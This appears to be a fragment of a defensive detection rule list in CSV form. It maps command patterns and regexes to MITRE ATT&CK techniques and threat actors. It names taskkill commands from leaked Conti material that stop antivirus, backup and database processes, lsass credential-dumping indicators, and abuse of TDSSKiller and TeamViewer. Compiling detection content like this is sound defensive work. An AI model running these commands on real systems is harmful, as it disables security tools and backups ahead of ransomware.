"*taskkill /im onenote.exe /F*",".{0,1000}taskkill\s\/im\sonenote\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im oracle.exe /F*",".{0,1000}taskkill\s\/im\soracle\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im outlook.exe /F*",".{0,1000}taskkill\s\/im\soutlook\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /IM PccNTMon.exe /F*",".{0,1000}taskkill\s\/IM\sPccNTMon\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im powerpnt.exe /F*",".{0,1000}taskkill\s\/im\spowerpnt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im savfmsesp.exe /f*",".{0,1000}taskkill\s\/im\ssavfmsesp\.exe\s\/f.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im sqbcoreservice.exe /F*",".{0,1000}taskkill\s\/im\ssqbcoreservice\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Backup","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im sqlagent.exe /F*",".{0,1000}taskkill\s\/im\ssqlagent\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im sqlbrowser.exe /F*",".{0,1000}taskkill\s\/im\ssqlbrowser\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im sqlservr.exe /F*",".{0,1000}taskkill\s\/im\ssqlservr\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im synctime.exe /F*",".{0,1000}taskkill\s\/im\ssynctime\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Synchronization Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im tbirdconfig.exe /F*",".{0,1000}taskkill\s\/im\stbirdconfig\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client Configuration","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im thebat.exe /F*",".{0,1000}taskkill\s\/im\sthebat\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im thebat64.exe /F*",".{0,1000}taskkill\s\/im\sthebat64\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im thunderbird.exe /F*",".{0,1000}taskkill\s\/im\sthunderbird\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /IM tmlisten.exe /F*",".{0,1000}taskkill\s\/IM\stmlisten\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im visio.exe /F*",".{0,1000}taskkill\s\/im\svisio\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im winword.exe /F*",".{0,1000}taskkill\s\/im\swinword\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im wordpad.exe /F*",".{0,1000}taskkill\s\/im\swordpad\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Text Editor","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im xfssvccon.exe /F*",".{0,1000}taskkill\s\/im\sxfssvccon\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Financial Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im zoolz.exe /F*",".{0,1000}taskkill\s\/im\szoolz\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Backup Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill -f -im fdhost.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdhost\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im fdlauncher.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdlauncher\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im fdlauncher.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdlauncher\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im MsDtsSrvr.exe*",".{0,1000}taskkill\s\-f\s\-im\sMsDtsSrvr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im msftesql.exe*",".{0,1000}taskkill\s\-f\s\-im\smsftesql\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im msmdsrv.exe*",".{0,1000}taskkill\s\-f\s\-im\smsmdsrv\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im pg_ctl.exe*",".{0,1000}taskkill\s\-f\s\-im\spg_ctl\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im postgres.exe*",".{0,1000}taskkill\s\-f\s\-im\spostgres\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im ReportingServicesService.exe*",".{0,1000}taskkill\s\-f\s\-im\sReportingServicesService\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im SQLAGENT.EXE*",".{0,1000}taskkill\s\-f\s\-im\sSQLAGENT\.EXE.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im sqlbrowser.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlbrowser\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im sqlceip.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlceip\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im sqlservr.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlservr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im sqlservr.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlservr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im sqlwriter.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlwriter\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill -f -im Ssms.exe*",".{0,1000}taskkill\s\-f\s\-im\sSsms\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill.exe /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","greyware_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill.exe /F /IM msiexec.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\smsiexec\.exe.{0,1000}","greyware_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tasklist /fi *Imagename eq lsass.exe*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}","greyware_tool_keyword","tasklist","This might indicate an attempt to dump credentials. Investigate the process tree.","T1555","TA0006 - TA0007","N/A","APT5 - APT29 - OilRig - Ke3chang - Earth Lusca - Volt Typhoon - APT1 - Threat Group-3390 - Deep Panda - Turla - Naikon","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tasklist /svc | findstr /i ""vmtoolsd.exe""*",".{0,1000}tasklist\s\/svc\s\|\sfindstr\s\/i\s\""vmtoolsd\.exe\"".{0,1000}","greyware_tool_keyword","tasklist","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","APT5 - APT29 - OilRig - Ke3chang - Earth Lusca - Volt Typhoon - APT1 - Threat Group-3390 - Deep Panda - Turla - Naikon","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*<Data Name='PipeName'>\lsass</Data><Data Name='Image'>C:\Windows\System32\Taskmgr.exe</Data>*",".{0,1000}\<Data\sName\=\'PipeName\'\>\\lsass\<\/Data\>\<Data\sName\=\'Image\'\>C\:\\Windows\\System32\\Taskmgr\.exe\<\/Data\>.{0,1000}","greyware_tool_keyword","Taskmgr","dump lsass process with Taskmgr","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A"
"*tcpdump *",".{0,1000}tcpdump\s.{0,1000}","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*/TDSSKiller.exe*",".{0,1000}\/TDSSKiller\.exe.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/tdsskiller.zip*",".{0,1000}\/tdsskiller\.zip.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\TDSSKiller.exe*",".{0,1000}\\TDSSKiller\.exe.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\tdsskiller.zip*",".{0,1000}\\tdsskiller\.zip.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*>TDSS rootkit removing tool<*",".{0,1000}\>TDSS\srootkit\sremoving\stool\<.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#description","N/A","8","10","N/A","N/A","N/A","N/A"
"*>TDSSKiller<*",".{0,1000}\>TDSSKiller\<.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A"
"*2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009*",".{0,1000}2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*http://support.kaspersky.com/viruses/tdsskiller.xmlt*",".{0,1000}http\:\/\/support\.kaspersky\.com\/viruses\/tdsskiller\.xmlt.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe --IPCport 5939 --Module 1*",".{0,1000}\.exe\s\-\-IPCport\s5939\s\-\-Module\s1.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","https://github.com/SigmaHQ/sigma/pull/4759","10","10","N/A","N/A","N/A","N/A"
"*.router.teamviewer.com*",".{0,1000}\.router\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*/Create /TN TVInstallRestore /TR *",".{0,1000}\/Create\s\/TN\sTVInstallRestore\s\/TR\s.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\TeamViewer*",".{0,1000}\\AppData\\Roaming\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\TeamViewer*",".{0,1000}\\CurrentControlSet\\Services\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\TeamViewer*",".{0,1000}\\Program\sFiles\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\RemoteSupport\127.0.0.1.tvc*",".{0,1000}\\RemoteSupport\\127\.0\.0\.1\.tvc.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\Services\TeamViewer\*",".{0,1000}\\Services\\TeamViewer\\.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#registry","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\Software\TeamViewer\Temp*",".{0,1000}\\Software\\TeamViewer\\Temp.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewer.exe*",".{0,1000}\\TeamViewer\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewer\Connections.txt*",".{0,1000}\\TeamViewer\\Connections\.txt.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewer\Connections_incoming.txt*",".{0,1000}\\TeamViewer\\Connections_incoming\.txt.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewer_.ex*",".{0,1000}\\TeamViewer_\.ex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
